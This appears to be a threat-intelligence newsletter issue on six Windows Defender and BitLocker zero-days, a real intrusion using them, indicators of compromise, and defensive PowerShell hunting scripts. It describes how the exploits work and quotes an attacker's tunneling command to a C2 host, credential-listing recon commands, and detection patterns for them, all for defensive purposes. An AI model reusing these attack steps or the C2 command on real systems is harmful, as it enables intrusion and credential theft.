Intruvent Edge: Your Defender Dashboard Says Green. It Might Be Lying
The Nightmare-Eclipse campaign has produced more real-world damage than most APT operations this quarter. The exploits, the IOCs, and what your team should do before June 10.
Welcome to Intruvent Edge, our bi-weekly technical deep dive into a current cyber threat. If you found us through Prevent This, our weekly community newsletter covering cybersecurity for everyone, you’re in the right place. Both live on the same Substack. Feel free to share either one. We’re glad you’re here.
The Short Version
Since early April, a single anonymous security researcher has released six Windows zero-day exploits targeting Microsoft Defender, BitLocker, and core Windows internals. Three have been exploited in the wild by threat actors linked to Russian infrastructure. Three have been added to CISA’s Known Exploited Vulnerabilities catalog. As of this writing, only three of the six have patches. The researcher has promised more for June and July.
The researcher, operating under the alias Nightmare-Eclipse, claims to be a former Microsoft employee who was personally and professionally destroyed by the company. Whether that justifies dropping weaponizable exploit code on the open internet is a question the security community is actively debating. What is not debatable: the exploits work, attackers are using them, and your Defender-protected endpoints may be less protected than your dashboard suggests.
This article covers the technical details of each exploit, the observed attack chain, indicators of compromise you can hunt for today, and what is likely coming next.
The Backstory
On March 27, 2026, an anonymous account appeared on GitHub. Within days, a blog post followed: “I never wanted to reopen a blog and a new GitHub account to drop code. But someone violated our agreement and left me homeless with nothing.”
The author, using the aliases Nightmare-Eclipse, Chaotic Eclipse, and Dead Eclipse, claimed a prior professional relationship with Microsoft that ended in what they describe as deliberate personal destruction. “I was told personally by them that they will ruin my life and they did.” They alleged that Microsoft revoked their MSRC (Microsoft Security Response Center) reporting account, ignored requests for explanation, and “mopped the floor with me and pulled every childish game they could.”
Whether the grievance is legitimate is unknown. What is clear from the exploit code is that this person has deep, insider-level knowledge of Windows Defender internals, the Cloud Files API, NTFS transactional mechanisms, and MSRC processes. Multiple security outlets describe them as a “rumored former Microsoft employee.” The technical quality of the work is consistent with that assessment.
What followed was a methodical, escalating campaign: six zero-day exploits released over six weeks, each timed for maximum impact, each targeting a different Windows security surface.
The Six Exploits
1. BlueHammer (CVE-2026-33825) — April 2
Type: Local Privilege Escalation | CVSS: 7.8 | Status: Patched (April 14)
BlueHammer exploits a time-of-check to time-of-use (TOCTOU) race condition in Defender’s threat remediation engine. When Defender detects a malicious file, it performs a cleanup operation with SYSTEM-level privileges. BlueHammer interrupts that operation at a precise moment using an opportunistic lock (oplock), swaps the target path to a junction pointing at C:\Windows\System32, and lets Defender complete the write into the protected directory.
The extended chain goes further: it triggers a signature update that tricks Defender into copying the Security Account Manager (SAM) database, extracts NT password hashes, temporarily changes user passwords, and uses the new credentials to escalate to SYSTEM.
The proof-of-concept binary was distributed as FunnyApp.exe. The filename is trivial to change. Detection must focus on the behavior: Defender writing PE files into System32, NTFS junction creation in user directories targeting protected paths, and non-LSASS processes loading samlib.dll.
MITRE ATT&CK: T1068 (Exploitation for Privilege Escalation), T1574 (Hijack Execution Flow)
2. UnDefend (CVE-2026-45498) — April 12
Type: Defense Evasion | CVSS: 4.0 | Status: Patched (May 19-20)
UnDefend targets Defender’s update mechanism rather than escalating privileges directly. It operates in two modes:
Passive mode silently blocks all signature updates. Defender keeps running, but its threat intelligence freezes at whatever signatures were current when the exploit ran. New malware walks right past. The telltale indicator: Windows Update Error Code 80070643 appears during signature update attempts.
Aggressive mode waits for Microsoft to push a major platform update, then kills Defender entirely. The trigger is Microsoft’s own update mechanism.
The critical deception in both modes: Defender still reports itself as healthy to the management console. Dashboards show green. Compliance tools show protected. Everything looks fine while the endpoint is blind.
MITRE ATT&CK: T1562.001 (Impair Defenses: Disable or Modify Tools)
3. RedSun (CVE-2026-41091) — April 15-16
Type: Local Privilege Escalation | CVSS: Not scored at disclosure | Status: Patched (May 19-20)
RedSun is the most technically sophisticated of the six. It abuses Defender’s handling of cloud-tagged files via the Windows Cloud Files API.
The exploit registers a sync root using the provider name “SERIOUSLYMSFT” (a direct-match IOC reflecting the researcher’s frustration), drops a decoy executable named TieringEngineService.exe with a reversed EICAR string, converts it to a cloud placeholder, then uses an oplock race condition to redirect Defender’s rollback operation into C:\Windows\System32. Defender, running as SYSTEM, overwrites the legitimate TieringEngineService.exe with attacker-controlled content.
The final step activates the Storage Tiers Management Engine via DCOM, which executes the now-replaced binary. The payload detects the SYSTEM context, reads the target session ID from a named pipe (\\.\pipe\REDSUN), and spawns an interactive SYSTEM shell in the user’s active session.
Reliability: approximately 100% on fully patched April 2026 systems. No kernel exploit, no driver, no administrator interaction required. Reverse engineering of MpSvc.dll confirmed that no reparse point validation exists anywhere in the write-back chain.
MITRE ATT&CK: T1068 (Exploitation for Privilege Escalation), T1574 (Hijack Execution Flow)
4. YellowKey (CVE-2026-45585) — May 12
Type: BitLocker Security Feature Bypass | CVSS: 6.8 | Status: Mitigation only (no full patch)
Released one day after May Patch Tuesday, YellowKey exploits NTFS transaction log replay in the Windows Recovery Environment to bypass BitLocker full-disk encryption on machines using a TPM-only protector configuration.
Specially crafted files in an FsTx directory structure on a USB drive instruct the system to replay NTFS transaction logs during boot. The crafted transactions delete winpeshl.ini from the recovery environment. When WinRE launches, a command prompt appears instead of the normal recovery tools. Because TPM-only mode auto-decrypts on boot without user input, the attacker has unrestricted access to the BitLocker-protected volume.
The researcher described YellowKey as “one of the most insane discoveries I ever found” and claimed TPM+PIN configurations are also vulnerable, but declined to release that proof-of-concept. The current public exploit requires physical access to the original device (stolen drives alone cannot be unlocked because the TPM is bound to the motherboard).
Microsoft issued mitigation guidance on May 20 but has not released a full patch.
5. GreenPlasma (No CVE) — May 13
Type: Local Privilege Escalation (partial) | Status: Unpatched
Also released the day after May Patch Tuesday. GreenPlasma targets ctfmon.exe, the text input service that runs as SYSTEM in every interactive Windows session. An unprivileged user can create arbitrary memory-section objects within SYSTEM-writable directories by manipulating registry permissions.
The researcher deliberately released an incomplete version, calling it a “capture the flag challenge.” In its current state, it triggers a UAC consent prompt rather than delivering a silent SYSTEM shell. A motivated attacker could complete the final step independently.
6. MiniPlasma (No CVE) — Late May
Type: Local Privilege Escalation | Status: Unpatched (fix appears in Insider Canary only)
MiniPlasma is perhaps the most embarrassing for Microsoft. It targets cldflt.sys, the Windows Cloud Files Mini Filter Driver. The specific flaw, in the HsmOsBlockPlaceholderAccess routine, was originally discovered by Google Project Zero researcher James Forshaw in September 2020. Microsoft assigned it CVE-2020-17103 and reportedly patched it in December 2020.
Nightmare-Eclipse’s claim: “The exact same issue that was reported to Microsoft by Google Project Zero is actually still present, unpatched. I’m unsure if Microsoft just never patched the issue or the patch was silently rolled back at some point.”
BleepingComputer and security researcher Will Dormann independently confirmed that the original 2020 proof-of-concept works on fully patched May 2026 Windows 11. A standard user account gains a SYSTEM-level command prompt. The exploit does not work on Insider Preview Canary builds, suggesting a fix is in development but has not reached production.
The Cloud Files Mini Filter Driver is present by default on most Windows 11 installations because of OneDrive integration. The attack surface is broadly deployed.
The Chain: How They Work Together
Individually, each exploit is a serious vulnerability. Combined, they form a complete offensive toolkit:
Blind the guard: UnDefend freezes Defender’s signatures or kills it entirely while reporting healthy status to the management console.
Escalate to SYSTEM: BlueHammer, RedSun, or MiniPlasma: three independent paths to SYSTEM-level access through three different Windows subsystems. If one is patched, the attacker has two alternatives.
Access encrypted devices: YellowKey bypasses BitLocker on physically accessible machines.
Future persistence: GreenPlasma provides a fourth SYSTEM path through a different subsystem once the researcher (or someone else) completes the final step.
The sequencing matters. The Huntress-observed attack chain was: enter via stolen VPN credentials, deploy UnDefend to blind Defender, escalate via BlueHammer or RedSun, dump credentials, move laterally, deploy ransomware. First blind the guard dog, then walk through the front door with admin keys.
In the Wild: The Huntress Intrusion
Huntress Labs published the definitive incident report on April 20, documenting the first confirmed real-world intrusion using Nightmare-Eclipse tooling.
April 10: FunnyApp.exe (BlueHammer) staged in C:\Users\[REDACTED]\Pictures\ and quarantined by Defender as Exploit:Win32/DfndrPEBluHmr.BZ.
April 15, 13:44 UTC: Unauthorized SSL VPN connection from 78.29.48[.]29 (Russia) to the victim’s FortiGate firewall using stolen credentials.
April 16: RedSun attempted. UnDefend deployed (notably with the misspelled flag -agressive, suggesting the operator was not the author of the tooling). Post-exploitation commands: whoami /priv, cmdkey /list, net group. Then: agent.exe -server staybud.dpdns[.]org:443 -hide, deploying BeigeBurrow, a Go-based tunneling agent using HashiCorp’s Yamux library for persistent TCP relay.
An instructive detail: despite the attackers executing multiple tools, three of the four failed. Defender quarantined BlueHammer. RedSun never produced a result. UnDefend was operated incorrectly. Only BeigeBurrow successfully connected outbound. The attackers had access to sophisticated weaponry and fumbled the execution. That will not always be the case.
Indicators of Compromise
File Indicators
FunnyApp.exe (BlueHammer PoC, staged in \Pictures\)
RedSun.exe (staged in \Downloads\)
undef.exe / UnDefend.exe (staged in \Downloads\ks\ or \Downloads\kk\)
z.exe (renamed exploit binary)
agent.exe (BeigeBurrow tunneling agent)
Modified TieringEngineService.exe in C:\Windows\System32\
BeigeBurrow SHA-256: a2b6c7a9c4490df70de3cdbfa5fc801a3e1cf6a872749259487e354de2876b7c
Defender detection name: Exploit:Win32/DfndrPEBluHmr.BZ
Network Indicators
staybud.dpdns[.]org (BeigeBurrow C2, port 443)
78.29.48[.]29 (Russia, initial VPN access)
212.232.23[.]69 (Singapore, follow-on)
179.43.140[.]214 (Switzerland, follow-on)
Behavioral Indicators
Cloud sync provider registration using the string “SERIOUSLYMSFT” (exact-match RedSun indicator)
Named pipe creation: \\.\pipe\REDSUN
Modifications to C:\Windows\System32\TieringEngineService.exe
Repeated Windows Update Error Code 80070643 during Defender signature updates (UnDefend passive mode)
Defender signature timestamp stale beyond 72 hours despite dashboard showing healthy status
MsMpEng.exe writing PE/DLL/driver files to paths outside ProgramData\Microsoft\Windows Defender
NTFS junction creation in user directories targeting C:\Windows\System32
whoami /priv, cmdkey /list, net group spawned from unexpected parent processes
agent.exe with -server and -hide flags
VPN authentication from the same account across multiple countries within short timeframes
Detection and Hunting Guidance
Priority Action: Verify Defender Is Actually Working
Do not trust the dashboard. UnDefend’s entire purpose is to make Defender appear healthy while it is blind. Query the actual signature timestamp directly across your fleet:
Get-MpComputerStatus | Select-Object AntivirusSignatureLastUpdated
Alert on any host where signatures are older than 72 hours. If multiple endpoints report Error Code 80070643 simultaneously, investigate immediately. Clustered signature update failures are the highest-fidelity indicator currently available for UnDefend in passive mode.
Verify Patch Level
Confirm Defender Antimalware Platform version 4.18.26040.7 or later is deployed across all endpoints. This version patches BlueHammer, RedSun, and UnDefend. Confirm engine version 1.1.26040.8 or later for the related heap-based buffer overflow (CVE-2026-45584).
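The signature-freshness check and the platform/engine version check above are the same query run fleet-wide, so the following script combines them. It is an added example written for this article, not tooling from Microsoft, Huntress, or any of the repositories cited here. It assumes PowerShell remoting is enabled on the targets, that an inventory file hosts.txt exists (assumed path), and that Defender’s Operational log is available; the 72-hour threshold and the minimum versions are the ones stated in the text.

```powershell
# Added example for this article (not Microsoft's or any vendor's tooling):
# fleet check for stale signatures, unpatched platform/engine versions, and
# clustered 80070643 signature-update failures (UnDefend passive mode).
# Assumes WinRM is enabled and hosts.txt (assumed inventory file) lists one host per line.

$MinPlatform = [version]'4.18.26040.7'   # patches BlueHammer, RedSun, UnDefend
$MinEngine   = [version]'1.1.26040.8'    # heap-based buffer overflow, CVE-2026-45584
$StaleHours  = 72
$Targets     = Get-Content .\hosts.txt

$results = Invoke-Command -ComputerName $Targets -ErrorAction Continue -ScriptBlock {
    param($MinPlatform, $MinEngine, $StaleHours)

    $status = Get-MpComputerStatus
    $sigAge = (Get-Date) - $status.AntivirusSignatureLastUpdated

    # Defender records each failed security intelligence update as event 2001 in its
    # Operational log; UnDefend passive mode surfaces as repeated 0x80070643 failures.
    $updateFailures = Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-Windows Defender/Operational'
        Id        = 2001
        StartTime = (Get-Date).AddDays(-7)
    } -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match '80070643' }

    [pscustomobject]@{
        Host             = $env:COMPUTERNAME
        DashboardHealthy = $status.AntivirusEnabled -and $status.RealTimeProtectionEnabled
        SignatureAgeH    = [math]::Round($sigAge.TotalHours, 1)
        SignatureStale   = $sigAge.TotalHours -gt $StaleHours
        PlatformVersion  = $status.AMProductVersion
        PlatformPatched  = [version]$status.AMProductVersion -ge $MinPlatform
        EngineVersion    = $status.AMEngineVersion
        EnginePatched    = [version]$status.AMEngineVersion -ge $MinEngine
        Err80070643Count = @($updateFailures).Count
    }
} -ArgumentList $MinPlatform, $MinEngine, $StaleHours

# The rows that matter: hosts that report healthy but are stale, unpatched,
# or logging 80070643 failures. DashboardHealthy = True on a stale host is
# exactly the deception UnDefend is designed to produce.
$results |
    Where-Object { $_.SignatureStale -or -not $_.PlatformPatched -or -not $_.EnginePatched -or $_.Err80070643Count -gt 0 } |
    Sort-Object SignatureAgeH -Descending |
    Format-Table Host, DashboardHealthy, SignatureAgeH, PlatformVersion, PlatformPatched,
                 EngineVersion, EnginePatched, Err80070643Count -AutoSize
```

Run it on a schedule and alert when several hosts show Err80070643Count above zero in the same window: a single failure is noise, a cluster is the indicator the article describes.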
Sigma Rules
The BlueHammerFix repository (github.com/technoherder/BlueHammerFix) provides 7 Sigma rules and 4 YARA rules covering the full attack chain. Key rules to deploy:
bluehammer_samlib_load.yml — Non-LSASS process loading samlib.dll
bluehammer_rapid_password_change.yml — Password change-logon-restore cycle
bluehammer_junction_basenamed.yml — Junction to BaseNamedObjects
bluehammer_cloudfiles_abuse.yml — Cloud Files API invocation by non-provider process
bluehammer_lsa_bootkey_access.yml — LSA boot key registry access
KQL Detection Packs
Two community-maintained detection packs for Microsoft Defender XDR and Sentinel are available on GitHub:
Letlaka/redsun-bluehammer-undefend-detection-pack: Full attack chain queries for all three patched exploits, plus cross-family hunting for BeigeBurrow follow-on activity. Uses the DeviceFileEvents, DeviceProcessEvents, and DeviceRegistryEvents tables.
3ch0p01nt/RedSun_Undefend: Hunt queries and defensive recommendations specifically for RedSun and UnDefend.
Sysmon Event IDs to Monitor
Event ID 1 (ProcessCreate): whoami /priv, cmdkey /list, net group from unexpected parents; agent.exe with -server / -hide flags
Event ID 11 (FileCreate): Suspicious filenames in \Pictures\ or \Downloads\; modifications to TieringEngineService.exe; Defender writing binaries to non-standard paths
Event ID 12/13/14 (Registry): Registry modifications in DEFAULT hive (MiniPlasma); LSA boot key access (BlueHammer)
Defender Operational Log 1116-1117: Detection and remediation events (correlate with TOCTOU timing)
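For teams without a SIEM ingesting Sysmon yet, the Event ID 1 indicators above can be hunted locally. The script below is an added example written for this article, not code from the detection packs or repositories named here. It assumes Sysmon is installed with its default Operational log name and captures command lines; the list of "expected" parent processes is an assumption to tune per environment. The patterns cover the recon commands, the BeigeBurrow agent.exe flags, and the UnDefend flag (including the misspelled -agressive seen in the Huntress intrusion).

```powershell
# Added example (not from the article's cited detection packs): local hunt over
# Sysmon Event ID 1 (ProcessCreate) for the behaviours listed above.
# Assumes Sysmon's default log name and command-line capture. $ExpectedParents is an
# assumption; adjust it to the shells and launchers normal in your environment.

$Since = (Get-Date).AddDays(-7)

# Parents from which an interactive operator running recon commands is ordinary.
$ExpectedParents = @('explorer.exe', 'cmd.exe', 'powershell.exe', 'pwsh.exe', 'WindowsTerminal.exe')

$Rules = @(
    @{ Name = 'recon-from-unexpected-parent'
       Pattern = '(?i)\bwhoami(\.exe)?\b.*\s/priv\b|\bcmdkey(\.exe)?\b.*\s/list\b|\bnet1?(\.exe)?\b\s+group\b'
       CheckParent = $true }
    @{ Name = 'beigeburrow-agent-flags'
       Pattern = '(?i)\bagent\.exe\b.*(\s-server\b|\s-hide\b)'
       CheckParent = $false }
    @{ Name = 'undefend-flag'
       Pattern = '(?i)\b(undef|undefend|z)\.exe\b.*\s-ag+ressive\b'   # -agressive / -aggressive
       CheckParent = $false }
)

# Flatten each ProcessCreate event's EventData into a simple object.
$events = Get-WinEvent -FilterHashtable @{
    LogName   = 'Microsoft-Windows-Sysmon/Operational'
    Id        = 1
    StartTime = $Since
} -ErrorAction Stop | ForEach-Object {
    $xml  = [xml]$_.ToXml()
    $data = @{}
    foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
    [pscustomobject]@{
        Time        = $_.TimeCreated
        Image       = $data['Image']
        CommandLine = $data['CommandLine']
        User        = $data['User']
        ParentImage = $data['ParentImage']
    }
}

$hits = foreach ($e in $events) {
    $parentName = if ($e.ParentImage) { [IO.Path]::GetFileName($e.ParentImage) } else { '' }
    foreach ($r in $Rules) {
        if ($e.CommandLine -notmatch $r.Pattern) { continue }
        # Recon commands are only interesting when the parent is not a normal shell.
        if ($r.CheckParent -and ($ExpectedParents -contains $parentName)) { continue }
        $e | Select-Object Time, User, ParentImage, CommandLine, @{ n = 'Rule'; e = { $r.Name } }
        break
    }
}

$hits | Sort-Object Time | Format-Table Time, Rule, User, ParentImage, CommandLine -AutoSize -Wrap
```

Correlate any recon hit with Event ID 11 writes under \Pictures\ or \Downloads\ from the same user around the same time; in the Huntress timeline those preceded the UnDefend and BeigeBurrow launches.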
YARA and Network Rules
BeigeBurrow YARA rule:
github.com/RussianPanda95/Yara-Rules/blob/main/BeigeBurrow/win_mal_BeigeBurrow.yar
BlueHammerFix YARA rules: 4 rules available in the technoherder repository
Suricata rule SID 2026041701: detects potential RedSun/BlueHammer/UnDefend downloads
What Should Organizations Do?
Immediate Actions
Verify Defender platform version 4.18.26040.7 or later on every endpoint. This patches BlueHammer, RedSun, and UnDefend.
Query signature freshness directly using Get-MpComputerStatus. Do not rely on dashboard indicators.
Baseline the SHA-256 hash of TieringEngineService.exe on all endpoints. Any modification triggers an immediate investigation.
Deploy the Sigma and KQL detection rules listed above.
Apply YellowKey mitigations: Enforce TPM+PIN for BitLocker (the published exploit only works against TPM-only configurations). Review Microsoft’s May 20 mitigation guidance for the WinRE registry workaround.
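Two of the immediate actions, the TieringEngineService.exe baseline and the YellowKey protector check, can be done in one endpoint script. This is an added example written for this article, not Microsoft’s guidance or any vendor’s tooling. It assumes the BitLocker and Defender modules are present and that a shared baseline CSV path exists (the UNC path is assumed). Beyond the hash the article asks for, it also checks the Authenticode signature, which catches an attacker-controlled replacement even on a host whose baseline was never recorded.

```powershell
# Added example (not from the article's sources): integrity check for the RedSun
# target binary plus the BitLocker protector check for YellowKey.
# $BaselinePath is an assumed location for a CSV of known-good hashes.

$Target       = 'C:\Windows\System32\TieringEngineService.exe'
$BaselinePath = '\\fileserver\baselines\TieringEngineService.csv'

# --- 1. RedSun: is TieringEngineService.exe still the Microsoft binary? ---
# Two independent checks: SHA-256 against the recorded baseline, and the Authenticode
# signature. Content written by Defender's rollback on the attacker's behalf will not
# carry a valid Microsoft signature, so the second check works before any baseline exists.
$hash  = (Get-FileHash -Algorithm SHA256 -Path $Target).Hash
$sig   = Get-AuthenticodeSignature -FilePath $Target
$sigOk = ($sig.Status -eq 'Valid') -and ($sig.SignerCertificate.Subject -match 'O=Microsoft Corporation')

if (Test-Path $BaselinePath) {
    $hashOk = [bool](Import-Csv $BaselinePath | Where-Object { $_.Hash -eq $hash })
} else {
    # First run for this build: record the hash only if the signature is good.
    $hashOk = $sigOk
    if ($sigOk) {
        [pscustomobject]@{
            Hash     = $hash
            Version  = (Get-Item $Target).VersionInfo.FileVersion
            Recorded = (Get-Date).ToString('o')
        } | Export-Csv -Path $BaselinePath -NoTypeInformation -Append
    }
}

$integrity = [pscustomobject]@{
    Host           = $env:COMPUTERNAME
    Hash           = $hash
    HashInBaseline = $hashOk
    SignatureOk    = $sigOk
    LastWriteUtc   = (Get-Item $Target).LastWriteTimeUtc
}

# --- 2. YellowKey: OS volume protector type ---
# A 'Tpm' protector without 'TpmPin' is the TPM-only configuration that auto-unlocks at
# boot, which the published exploit relies on. TPM+PIN is the mitigation the article names.
$osVol      = Get-BitLockerVolume -MountPoint $env:SystemDrive
$protectors = @($osVol.KeyProtector.KeyProtectorType)
$bitlocker  = [pscustomobject]@{
    Host       = $env:COMPUTERNAME
    Encrypted  = $osVol.ProtectionStatus -eq 'On'
    Protectors = ($protectors -join ',')
    TpmOnly    = ($protectors -contains 'Tpm') -and ($protectors -notcontains 'TpmPin')
}

$integrity | Format-List
$bitlocker | Format-List

if (-not $integrity.SignatureOk -or -not $integrity.HashInBaseline) {
    Write-Warning "TieringEngineService.exe on $env:COMPUTERNAME fails integrity checks: treat as a RedSun indicator and preserve the file for analysis."
}
if ($bitlocker.TpmOnly) {
    Write-Warning "OS volume on $env:COMPUTERNAME is TPM-only: enforce TPM+PIN (YellowKey mitigation)."
}
```

Push the script through your management tooling and collect the two objects centrally; a LastWriteUtc on TieringEngineService.exe that does not line up with a Windows update window is worth a look even when the hash matches a baseline recorded later.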
Ongoing Posture
Monitor for MiniPlasma: No patch exists for production Windows. The cldflt.sys driver is present on most Windows 11 installations via OneDrive. Watch for the fix in the June 10 Patch Tuesday.
Audit SSL VPN credentials: The observed intrusion entered through stolen FortiGate VPN credentials. Enforce MFA on all remote access, review for impossible-travel patterns, and rotate credentials for any accounts with unexplained activity.
Prepare for June and July: Nightmare-Eclipse has promised a “big surprise” for the June 10 Patch Tuesday and has threatened a major disclosure on July 14. The researcher has followed through on every prior threat. Plan for accelerated patch cycles around those dates.
Do not depend solely on Defender: Three of the six exploits specifically target Defender’s internal mechanisms. Organizations relying exclusively on Defender for endpoint protection should consider layered defenses: a secondary EDR agent, application whitelisting, or network-level detection.
The Responsible Disclosure Debate
Microsoft’s MSRC published a blog post calling out the anonymous researcher for bypassing coordinated disclosure: “The details of these vulnerabilities were not shared with Microsoft prior to release, and the disclosures put our customers at unnecessary risk.” Microsoft has described uncoordinated disclosure as “never justifiable” and used legal language broad enough to cover “both actual attackers and researchers who enable them with proof of concepts.”
The security community’s reaction was skeptical. Researchers at SpecterOps and TrustedSec shared their own frustrating experiences with MSRC. Jason Lang, Team Lead of Targeted Operations at TrustedSec, wrote: “I’ve heard nothing but horror stories about those submitting to MSRC, so it’s no surprise that this would be the fallout.”
Barracuda Networks took the opposite position, explicitly classifying Nightmare-Eclipse as a “malicious actor, not a whistleblower, not a responsible disclosure advocate, and not a neutral researcher.”
The researcher claims they reported through proper channels first and were rebuffed. At the same time, the Huntress intrusion confirms that real organizations were compromised by real attackers using this exploit code within days of its release. The grievance may be legitimate. The collateral damage is also real.
GitHub (owned by Microsoft) banned the researcher’s account around May 23. GitLab suspended the account days later. Unfortunately, clones spread within hours. The bans may have generated more sympathy for the researcher than the original disclosures did.
What Comes Next
Nightmare-Eclipse has followed through on every prior threat. The escalation pattern is deliberate: privilege escalation, then defense evasion, then BitLocker bypass, then hints at remote code execution. Each release was timed to maximize embarrassment, landing on or immediately after Patch Tuesday.
Three things to watch:
June 10 (Patch Tuesday): The researcher has promised a “big surprise.” They have also claimed they will “drag other companies into this,” suggesting exploits targeting vendors beyond Microsoft.
July 14: Nightmare-Eclipse has publicly announced a major disclosure on this date. The researcher previously hinted at releasing remote code execution vulnerabilities, which would be a qualitative escalation from the local privilege escalation and defense evasion exploits released so far.
The “dead man’s switch”: The researcher claims to have deployed an automated system that will release additional exploits if certain conditions are met. Security experts note: “They claim to have a dead man’s switch with more ready to go. This researcher has followed through on every prior threat.”
We will continue tracking this story. If the June or July disclosures materialize, expect a follow-up edition.
Patch Status Summary
BlueHammer (CVE-2026-33825): Patched, April 14. Defender Platform 4.18.26030.3011.
UnDefend (CVE-2026-45498): Patched, May 19-20. Defender Platform 4.18.26040.7.
RedSun (CVE-2026-41091): Patched, May 19-20. Defender Platform 4.18.26040.7.
YellowKey (CVE-2026-45585): Mitigation guidance only. No full patch.
GreenPlasma: Unpatched. No CVE assigned.
MiniPlasma: Unpatched. Fix appears in Insider Canary builds only. Relates to CVE-2020-17103.
Next Patch Tuesday: June 10, 2026.
Sources
Barracuda Networks: Six Zero-Days, Six Weeks and One Big Grudge (May 19, 2026)
Huntress Labs: Nightmare-Eclipse Tooling in Real-World Intrusion (April 20, 2026)
The Hacker News: Microsoft Slams Public Zero-Day Disclosures
The Register: Disgruntled Researcher Releases Two More Zero-Days
CISA KEV: CVE-2026-33825 (April 22, 2026)
CISA KEV: CVE-2026-41091 and CVE-2026-45498 (May 20, 2026)
Intruvent Technologies, Golden CTI Database (Codex), queried May 28, 2026
Intruvent Edge is a bi-weekly threat intelligence newsletter from Intruvent Technologies. For custom, localized cyber threat intelligence, visit intruvent.com/brace.